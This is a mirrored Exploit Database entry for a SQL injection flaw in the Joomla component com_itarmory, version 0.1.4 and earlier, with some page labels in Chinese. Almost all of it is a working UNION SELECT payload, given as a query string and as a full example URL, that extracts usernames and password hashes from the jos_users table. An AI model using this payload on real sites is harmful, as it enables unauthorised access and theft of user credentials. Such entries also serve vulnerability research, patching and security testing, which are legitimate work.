Joomla! Component com_itarmory – SQL Injection

• Exploit Database
• 10 阅读

• 作者： Craw
  日期： 2010-07-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14463/

• # Author: Craw
  # Email: craw@element7.eu
  # Software Link: http://www.intherapy.eu/index.php/itarmory-component/category/3-component
  # Version: <=0.1.4
  # Category: webapplications
  
  =======================================================
  
  [+] Vulnerable File :
  
   http://www.site.com/index.php?option=com_itarmory&view=guildmembers&Itemid=[SQL]
  
   
  [+] ExploiT :
  
   ?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+
  
   
  [+] Example :
  
   http://www.site.com/index.php?option=com_itarmory&view=guildmembers&Itemid=?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+
  
   
  
  =======================================================
  Greetz @ LUXEMBOURG
  =======================================================